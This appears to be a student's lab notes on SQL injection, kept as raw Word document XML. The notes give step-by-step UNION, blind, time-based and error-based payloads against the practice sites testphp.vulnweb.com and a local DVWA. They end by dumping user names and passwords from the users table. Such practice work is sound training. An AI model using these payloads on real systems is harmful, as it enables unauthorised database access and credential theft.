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4FC" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9" w:rsidP="00783E6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C2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9" w:rsidP="00783E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C2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UNION based SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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Find a GET() parameter in the website.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5298357" wp14:editId="34A08B6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6D69E9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Generate a SQL error to find the database being used by the site :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33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6D69E9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http://testphp.vulnweb.com/listproducts.php?cat=1’</w:t>
        </w:r>
        <w:r w:rsidR="006D69E9" w:rsidRPr="00CC2787">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:drawing>
            <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FECD46E" wp14:editId="4B9E51DB">
              <wp:extent cx="5731510" cy="3222625"/>
              <wp:effectExtent l="0" t="0" r="254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Screenshot (118).png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222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6D69E9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Find the number number of columns :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33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6D69E9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6D69E9" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 12--+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if an error pops, it means order value exceeds the no.of columns.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402626B" wp14:editId="4A86900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363A33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13" w:history="1">
        <w:r w:rsidR="006D69E9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6D69E9" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 11--+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if an error doesn’t pop, it means order by value is less or equal to no.of columns.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0367F5D" wp14:editId="15C0C95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6D69E9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Find the vulnerable column numbers :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33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6D69E9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6D69E9" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,3,4,5,6,7,8,9,10,11--+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F576C32" wp14:editId="07DE9B2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Which means column 11,7,2,9 are vulnerable.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6D69E9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 xml:space="preserve">Find the database and version : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33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7" w:history="1">
        <w:r w:rsidR="006D69E9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6D69E9" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,database(),3,4,5,6,7,8,version(),10,11--+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CF204D2" wp14:editId="0BAFBAF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6D69E9" w:rsidP="004E040B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C278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 xml:space="preserve">Find the table name :  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33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6D69E9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6D69E9" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,3,4,5,6,7,8,9,10,table_name from information_schema.tables--+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="006D69E9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6E2D771" wp14:editId="376FE13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6473F" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33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21" w:history="1">
        <w:r w:rsidR="0096473F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96473F" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name) from information_schema.tables--+</w:t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CE805F7" wp14:editId="0C39A3C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6473F" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33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23" w:history="1">
        <w:r w:rsidR="0096473F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96473F" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name) from information_schema.columns--+</w:t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16F6CC2" wp14:editId="0AAC27A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6473F" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33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25" w:history="1">
        <w:r w:rsidR="0096473F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96473F" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name) from information_schema.columns where table_name=”users”--+</w:t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E966BC2" wp14:editId="0BB0B01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D69E9" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33" w:rsidP="004E04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27" w:history="1">
        <w:r w:rsidR="0096473F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http://testphp.vulnweb.com/listproducts.php?cat=-1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0096473F" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> union select 1,2,3,4,5,6,7,8,9,10, group_concat(uname,0x0a,pass) from users--+</w:t>
      </w:r>
      <w:r w:rsidR="006D69E9"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96473F" w:rsidRPr="00CC2787" w:rsidRDefault="0096473F" w:rsidP="00783E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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C2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Boolean based SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126E89" w:rsidRPr="00CC2787" w:rsidRDefault="00126E89" w:rsidP="00783E6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:rsidR="00162227" w:rsidRPr="00CC2787" w:rsidRDefault="00162227" w:rsidP="00783E60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C2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BLIND based</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162227" w:rsidRPr="00CC2787" w:rsidRDefault="00162227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26E89" w:rsidRDefault="00F870CF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 w:rsidR="004E040B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dvwa/vulnerabilities/sqli/?id=1’&amp;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F870CF" w:rsidRDefault="00F870CF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6F4F7D6" wp14:editId="0ED49FD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5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hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00720B8A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>’ and 1=1--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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AB47984" wp14:editId="58A6B16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5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>dvwa/vulnerabilities/sqli/?id=5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>’ and 1=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1 order by 3--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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205F78C" wp14:editId="29F68EA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5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 xml:space="preserve">dvwa/vulnerabilities/sqli/?id=5’ and 1=1 order </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>by 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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0C5B758" wp14:editId="0C175D4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5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 xml:space="preserve">dvwa/vulnerabilities/sqli/?id=5’ and 1=1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>union select 1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2--+&amp;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18EA27" wp14:editId="71DBAD6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5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 xml:space="preserve">dvwa/vulnerabilities/sqli/?id=5’ and 1=1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>union select database(),version()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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0A1DDA4" wp14:editId="1CC0B37F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6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>dvwa/vulnerabilities/sqli/?id=5’ and 1=1 union s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>elect 1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table_name from information_schema.tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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874A98" wp14:editId="1D45974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6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>dvwa/vulnerabilities/sqli/?id=5’ and 1=1 union select 1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>group_concat(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>table_name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from information_schema.tables--+&amp;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01ECCC6" wp14:editId="48A2B60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6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B" w:rsidRDefault="004E040B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E040B" w:rsidRDefault="004E040B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>dvwa/vulnerabilities/sqli/?id=5’ and 1=1 union select 1,group_concat(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_name)</w:t>
      </w:r>
      <w:r w:rsidR="00783E60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> from information_schema.columns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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4816BC" wp14:editId="2B9CF23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6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83E60" w:rsidRDefault="00783E60" w:rsidP="00783E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E040B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://127.0.0.1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dvwa/vulnerabilities/sqli/?id=5’ and 1=1 union select 1,group_concat(column_name) from information_schema.columns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> where table_name=”users”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--+&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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5E5B316" wp14:editId="281406C5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6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83E60" w:rsidRPr="00783E60" w:rsidRDefault="00783E60" w:rsidP="00783E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83E60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=5’ and 1=1 union select 1,group_concat(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>user,0x0a,password</w:t>
      </w:r>
      <w:r w:rsidRPr="00783E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from users</w:t>
      </w:r>
      <w:r w:rsidRPr="00783E60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--+&amp;Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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5B85CC1" wp14:editId="4CCB3C24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6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83E60" w:rsidRDefault="00783E60" w:rsidP="00783E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decrypt the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126E89" w:rsidRPr="00CC2787" w:rsidRDefault="00783E60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5A632FE" wp14:editId="73FF0EDD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66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27" w:rsidRPr="00CC2787" w:rsidRDefault="0016222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162227" w:rsidRPr="00CC2787" w:rsidRDefault="00162227" w:rsidP="00783E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="10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C2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TIME based</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2B6C" w:rsidRPr="00CC2787" w:rsidRDefault="006F2B6C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6F2B6C" w:rsidRPr="00CC2787" w:rsidRDefault="00363A33" w:rsidP="004E04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hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidR="006F2B6C" w:rsidRPr="00CC2787">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006F2B6C" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>' and sleep(10)--+ &amp;Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2B6C" w:rsidRPr="00CC2787" w:rsidRDefault="006F2B6C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96473F" w:rsidRPr="00CC2787" w:rsidRDefault="0096473F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27" w:rsidRPr="00CC2787" w:rsidRDefault="00162227" w:rsidP="004E040B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62227" w:rsidRPr="00CC2787" w:rsidRDefault="00162227" w:rsidP="00783E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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C2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>DOUBLE QUERY SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162227" w:rsidRPr="00CC2787" w:rsidRDefault="00162227" w:rsidP="004E04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62227" w:rsidRDefault="00162227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* from training</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783E60" w:rsidRPr="00783E60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To get the database table of training.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162227" w:rsidRPr="00CC2787" w:rsidRDefault="0016222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03B56B5" wp14:editId="2F7A60B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4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32" w:rsidRPr="00CC2787" w:rsidRDefault="00FA0632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FA0632" w:rsidRDefault="00FA0632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count(*) from training</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783E60" w:rsidRPr="00CC2787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get the number of columns present in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA0632" w:rsidRPr="00CC2787" w:rsidRDefault="00FA0632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6CD16F4" wp14:editId="74F66C1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32" w:rsidRPr="00CC2787" w:rsidRDefault="00FA0632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FA0632" w:rsidRDefault="00FA0632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ra</w:t>
      </w:r>
      <w:r w:rsidR="0052311D" w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>d()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783E60" w:rsidRPr="00CC2787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get a random integer.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0A1A6B2" wp14:editId="2484B84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36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rand()*2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783E60" w:rsidRPr="00CC2787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 the command multiple times to get the value greater than ‘1’.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9BB0DAE" wp14:editId="080888E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7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floor(rand()*2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783E60" w:rsidRPr="00CC2787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get the exact value ‘1’</w:t>
      </w:r>
      <w:r w:rsidR="00F47658">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> or ‘0’.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5D3C2FB" wp14:editId="17EBD7C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floor(rand()*2)jony</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783E60" w:rsidRPr="00CC2787" w:rsidRDefault="00783E60" w:rsidP="00783E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get the name as </w:t>
      </w:r>
      <w:r w:rsidR="00F47658">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>jony.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1406C17" wp14:editId="2F7F7DC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9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Pr="00CC2787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table_name,table_schema from information_schema.tables group by table_schema;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2EA4F2B" wp14:editId="21EC098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40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Pr="00CC2787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database();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C3589B3" wp14:editId="6CF07BA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41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Pr="00CC2787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select(select database());</w:t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E18F47A" wp14:editId="3E67B28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2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D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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52311D" w:rsidRPr="00CC2787" w:rsidRDefault="0052311D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concat(":",":",(select database()),":",":");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0052311D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92A0B79" wp14:editId="3D07153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43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9D4537" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537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concat(":",":",(select database()),":",":")jony;</w:t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23D8592" wp14:editId="5D39DFB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4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9D4537" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537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concat(":",":",(select database()),":",":",floor(rand()*2))jony;</w:t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D7B2048" wp14:editId="2792502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5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9D4537" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537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concat(":",":",(select database()),":",":",floor(rand()*2))jony from information_schema.columns;</w:t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75D5A4B" wp14:editId="135DB81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46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9D4537" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537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count(*),concat(":",":",(select database()),":",":",floor(rand()*2))jony from information_schema.tables group by jony;</w:t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B24D27B" wp14:editId="0EAB923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47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37" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537" w:rsidP="004E040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bookmarkStart w:id="0" w:name="_GoBack"/>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="009D4537" w:rsidRPr="00CC2787" w:rsidRDefault="009D4537" w:rsidP="004E04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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>select count(*),concat(":",":",(select version()),":",":",floor(rand()*2))jony from information_schema.tables group by jony;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D4537" w:rsidRPr="00F47658" w:rsidRDefault="009D4537" w:rsidP="00F476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C2787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D47F76E" wp14:editId="7CEC36B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4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537" w:rsidRPr="00F476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3A33" w:rsidRDefault="00363A33" w:rsidP="006D69E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00363A33" w:rsidRDefault="00363A33" w:rsidP="006D6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3A33" w:rsidRDefault="00363A33" w:rsidP="006D69E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00363A33" w:rsidRDefault="00363A33" w:rsidP="006D69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270C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B238A87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500BCE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4BA53DE"/>
    <w:lvl w:ilvl="0" w:tplc="4E4078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F81403"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D43C9E7E"/>
    <w:lvl w:ilvl="0" w:tplc="16E0E29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6C5171A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D603232"/>
    <w:lvl w:ilvl="0" w:tplc="29A88C8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7CF00F9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB6EBA0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4800BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41A01852"/>
    <w:lvl w:ilvl="0" w:tplc="94B20A8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9E9"/>
    <w:rsid w:val="00126E89"/>
    <w:rsid w:val="00162227"/>
    <w:rsid w:val="00363A33"/>
    <w:rsid w:val="004054FC"/>
    <w:rsid w:val="004E040B"/>
    <w:rsid w:val="0052311D"/>
    <w:rsid w:val="006D69E9"/>
    <w:rsid w:val="006F2B6C"/>
    <w:rsid w:val="00783E60"/>
    <w:rsid w:val="0096473F"/>
    <w:rsid w:val="009D4537"/>
    <w:rsid w:val="00BB5993"/>
    <w:rsid w:val="00CC2787"/>
    <w:rsid w:val="00E82DD3"/>
    <w:rsid w:val="00F47658"/>
    <w:rsid w:val="00F870CF"/>
    <w:rsid w:val="00FA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6871FD-93FB-4FFC-882C-34FB604E3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69E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D69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9E9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006D69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9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testphp.vulnweb.com/listproducts.php?cat=-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hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=-1" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1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hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=-1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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=-1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testphp.vulnweb.com/listproducts.php?cat=1'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://testphp.vulnweb.com/listproducts.php?cat=-1" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1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testphp.vulnweb.com/listproducts.php?cat=-1" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=-1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testphp.vulnweb.com/listproducts.php?cat=-1" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=-1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4A0F88-49E1-4407-B5F0-60755656C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20</Pages>
  <Words>742</Words>
  <Characters>4235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Kiira L</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kiira L</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-02T11:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-03T12:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>